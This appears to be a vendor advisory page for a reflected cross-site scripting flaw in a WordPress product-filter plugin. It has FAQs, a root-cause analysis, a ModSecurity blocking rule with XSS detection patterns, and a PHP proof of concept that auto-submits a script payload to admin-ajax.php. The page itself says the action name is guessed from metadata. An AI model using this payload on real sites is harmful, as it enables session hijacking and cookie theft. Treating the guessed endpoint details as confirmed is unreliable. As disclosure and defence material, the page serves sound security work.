What is CVE-2026-11603?

CVE-2026-11603 is a reflected cross-site scripting (XSS) vulnerability found in the Product Filter Widget for Elementor plugin for WordPress. It allows unauthenticated attackers to inject arbitrary web scripts via the ‘args[filterFormArray]’ parameter due to insufficient input sanitization and output escaping.

Who is affected by this vulnerability?

Any WordPress site using the Product Filter Widget for Elementor plugin version 1.0.6 or earlier is affected. Administrators should check their plugin version to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the installed version of the Product Filter Widget for Elementor plugin. If it is version 1.0.6 or earlier, your site is susceptible to CVE-2026-11603.

How can I fix this vulnerability?

To fix the vulnerability, you should disable the Product Filter Widget for Elementor plugin until a patched version is released. Additionally, when a fix is available, ensure that the plugin sanitizes and escapes the ‘args[filterFormArray]’ parameter properly.

What does a CVSS score of 6.1 indicate?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means the vulnerability poses a moderate risk, requiring user interaction to exploit, but can lead to significant consequences if successfully executed.

What are the practical risks associated with this vulnerability?

The practical risks include the execution of arbitrary JavaScript in the victim’s browser, which could lead to session hijacking, theft of cookies, or redirection to malicious sites. Since the endpoint is accessible without authentication, any user visiting a crafted link is at risk.

What is reflected cross-site scripting?

Reflected cross-site scripting (XSS) occurs when an attacker injects malicious scripts into a web application, which are then reflected back to users without proper validation. This type of attack typically requires the victim to click a link or visit a page controlled by the attacker.

How does the proof of concept demonstrate the vulnerability?

The proof of concept (PoC) shows how an attacker can craft a malicious form that automatically submits to the vulnerable AJAX endpoint, including a JavaScript payload. This demonstrates the ease of exploitation through user interaction, as the victim’s browser executes the injected script.

What is the role of nonce verification in preventing this vulnerability?

Nonce verification is a security measure that helps prevent cross-site request forgery (CSRF) attacks. By implementing nonce checks in AJAX requests, developers can ensure that the requests are legitimate and not initiated by an attacker, thereby mitigating the risk of exploitation.

What should I do while waiting for a patch?

While waiting for a patch, it is advisable to disable the Product Filter Widget for Elementor plugin to prevent any potential exploitation. Additionally, monitor for updates from the plugin developers regarding a fix.

How can I protect my WordPress site from similar vulnerabilities?

To protect your WordPress site from similar vulnerabilities, regularly update all plugins and themes, use security plugins that monitor for vulnerabilities, and implement best practices for input validation and sanitization in custom code.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 9, 2026

CVE-2026-11603: Product Filter Widget for Elementor <= 1.0.6 Reflected Cross-Site Scripting via 'args[filterFormArray]' Parameter PoC, Patch Analysis & Rule

CVE ID CVE-2026-11603

Plugin product-filter-widget-for-elementor

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.0.6

Patched Version —

Disclosed June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-11603 (metadata-based):

This vulnerability affects the Product Filter Widget for Elementor plugin up to version 1.0.6. It is a Reflected Cross-Site Scripting (XSS) vulnerability that allows unauthenticated attackers to inject arbitrary web scripts via the ‘args[filterFormArray]’ parameter. The CVSS score is 6.1 (Medium), reflecting a network-based attack with low complexity requiring user interaction.

Root Cause: Based on the CWE classification (79 – Improper Neutralization of Input During Web Page Generation) and the vulnerability description, the root cause is insufficient input sanitization and output escaping on the ‘args[filterFormArray]’ parameter. The plugin registers an AJAX handler via wp_ajax_nopriv_ (allowing unauthenticated access) without any nonce verification or capability check. This means the handler processes user-supplied data and reflects it in the response without properly escaping HTML/JavaScript. Atomic Edge analysis infers that the vulnerable code likely uses $_POST or $_GET to read the ‘args[filterFormArray]’ parameter and directly includes its value in the AJAX response or renders it in a way that allows script execution. No source code is available to confirm this, but the pattern is consistent with the CWE and the attack vector described.

Exploitation: An attacker crafts a malicious URL or HTML page that triggers an AJAX request to the WordPress admin-ajax.php endpoint with the action parameter set to the plugin’s registered action (likely ‘product_filter_widget_for_elementor_filter’ or similar, based on the plugin slug). The request includes the ‘args[filterFormArray]’ parameter containing a JavaScript payload, such as alert(‘XSS’). Because the endpoint lacks a nonce, the attacker can execute this via a CSRF-style auto-submitting form from an attacker-controlled page. When a logged-in or logged-out victim visits that page, the form automatically submits to admin-ajax.php, and the reflected XSS payload executes in the victim’s browser. The attack vector is Reflected XSS delivered through a crafted request, requiring user interaction (the victim visiting the attacker’s page or clicking a link).

Remediation: The plugin must sanitize and escape the ‘args[filterFormArray]’ parameter before use. The fix should apply WordPress escaping functions like esc_html(), esc_attr(), or wp_kses() depending on the context. Developers should also add a nonce check (check_ajax_referer()) to prevent CSRF attacks and a capability check (current_user_can()) if the functionality is sensitive. Since the vulnerability exists in all versions up to 1.0.6 and no patched version is available, users should disable the plugin until a fix is released.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim’s browser. This can lead to session hijacking, theft of authentication cookies, defacement of the WordPress admin interface, redirection to malicious sites, or extraction of sensitive data displayed on the page. Because the endpoint is accessible without authentication, any user visiting a crafted link or page is vulnerable. The CVSS score of 6.1 indicates a limited impact on confidentiality and integrity, but the lack of authentication and nonce requirements increases the practical risk.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:202611603,phase:2,deny,status:403,chain,msg:'CVE-2026-11603 via Product Filter Widget for Elementor AJAX handler',severity:'CRITICAL',tag:'CVE-2026-11603'"
SecRule ARGS_POST:action "@streq product_filter_widget_for_elementor_filter" "chain"
SecRule ARGS_POST:args[filterFormArray] "@rx <script|<img|<svg|<onload|<onerror|javascript:|vbscript:" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-11603 - Product Filter Widget for Elementor <= 1.0.6 - Reflected Cross-Site Scripting via 'args[filterFormArray]' Parameter

/*
 * This PoC demonstrates a CSRF-style attack that triggers reflected XSS
 * by submitting a crafted form to the vulnerable AJAX endpoint.
 * The attacker hosts this page and tricks the victim into visiting it.
 * The form auto-submits to admin-ajax.php with the XSS payload.
 *
 * Assumptions:
 * - The AJAX action is likely 'product_filter_widget_for_elementor_filter' based on plugin slug.
 * - The vulnerable parameter is 'args[filterFormArray]'.
 * - The site runs WordPress with the vulnerable plugin active.
 */

// Configuration: Set the target WordPress site URL
define('TARGET_URL', 'https://example.com'); // Change this to the target site

// XSS payload: a harmless alert for testing; replace with a real payload for actual exploitation
$payload = '<script>alert("XSS by Atomic Edge")</script>';

// Build the HTML page with an auto-submitting form
echo '<!DOCTYPE html><html><head><title>CVE-2026-11603 PoC</title></head><body>';
echo '<h1>Atomic Edge CVE-2026-11603 Proof of Concept</h1>';
echo '<p>This form auto-submits to the vulnerable endpoint. If the plugin is vulnerable, an alert will appear.</p>';
echo '<form id="xss_form" action="' . TARGET_URL . '/wp-admin/admin-ajax.php" method="POST">';
echo '<input type="hidden" name="action" value="product_filter_widget_for_elementor_filter">';
echo '<input type="hidden" name="args[filterFormArray]" value="' . htmlspecialchars($payload, ENT_QUOTES, 'UTF-8') . '">';
echo '</form>';
echo '<script>document.getElementById("xss_form").submit();</script>';
echo '</body></html>';
?>

Frequently Asked Questions

What is CVE-2026-11603?
Understanding the vulnerability
CVE-2026-11603 is a reflected cross-site scripting (XSS) vulnerability found in the Product Filter Widget for Elementor plugin for WordPress. It allows unauthenticated attackers to inject arbitrary web scripts via the ‘args[filterFormArray]’ parameter due to insufficient input sanitization and output escaping.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Product Filter Widget for Elementor plugin version 1.0.6 or earlier is affected. Administrators should check their plugin version to determine if they are vulnerable.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the installed version of the Product Filter Widget for Elementor plugin. If it is version 1.0.6 or earlier, your site is susceptible to CVE-2026-11603.
How can I fix this vulnerability?
Remediation steps
To fix the vulnerability, you should disable the Product Filter Widget for Elementor plugin until a patched version is released. Additionally, when a fix is available, ensure that the plugin sanitizes and escapes the ‘args[filterFormArray]’ parameter properly.
What does a CVSS score of 6.1 indicate?
Understanding risk levels
A CVSS score of 6.1 indicates a medium severity vulnerability. This means the vulnerability poses a moderate risk, requiring user interaction to exploit, but can lead to significant consequences if successfully executed.
What are the practical risks associated with this vulnerability?
Potential impacts on security
The practical risks include the execution of arbitrary JavaScript in the victim’s browser, which could lead to session hijacking, theft of cookies, or redirection to malicious sites. Since the endpoint is accessible without authentication, any user visiting a crafted link is at risk.
What is reflected cross-site scripting?
Defining the attack type
Reflected cross-site scripting (XSS) occurs when an attacker injects malicious scripts into a web application, which are then reflected back to users without proper validation. This type of attack typically requires the victim to click a link or visit a page controlled by the attacker.
How does the proof of concept demonstrate the vulnerability?
Understanding the PoC
The proof of concept (PoC) shows how an attacker can craft a malicious form that automatically submits to the vulnerable AJAX endpoint, including a JavaScript payload. This demonstrates the ease of exploitation through user interaction, as the victim’s browser executes the injected script.
What is the role of nonce verification in preventing this vulnerability?
Security measures
Nonce verification is a security measure that helps prevent cross-site request forgery (CSRF) attacks. By implementing nonce checks in AJAX requests, developers can ensure that the requests are legitimate and not initiated by an attacker, thereby mitigating the risk of exploitation.
What should I do while waiting for a patch?
Immediate actions to take
While waiting for a patch, it is advisable to disable the Product Filter Widget for Elementor plugin to prevent any potential exploitation. Additionally, monitor for updates from the plugin developers regarding a fix.
How can I protect my WordPress site from similar vulnerabilities?
Best practices for security
To protect your WordPress site from similar vulnerabilities, regularly update all plugins and themes, use security plugins that monitor for vulnerabilities, and implement best practices for input validation and sanitization in custom code.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations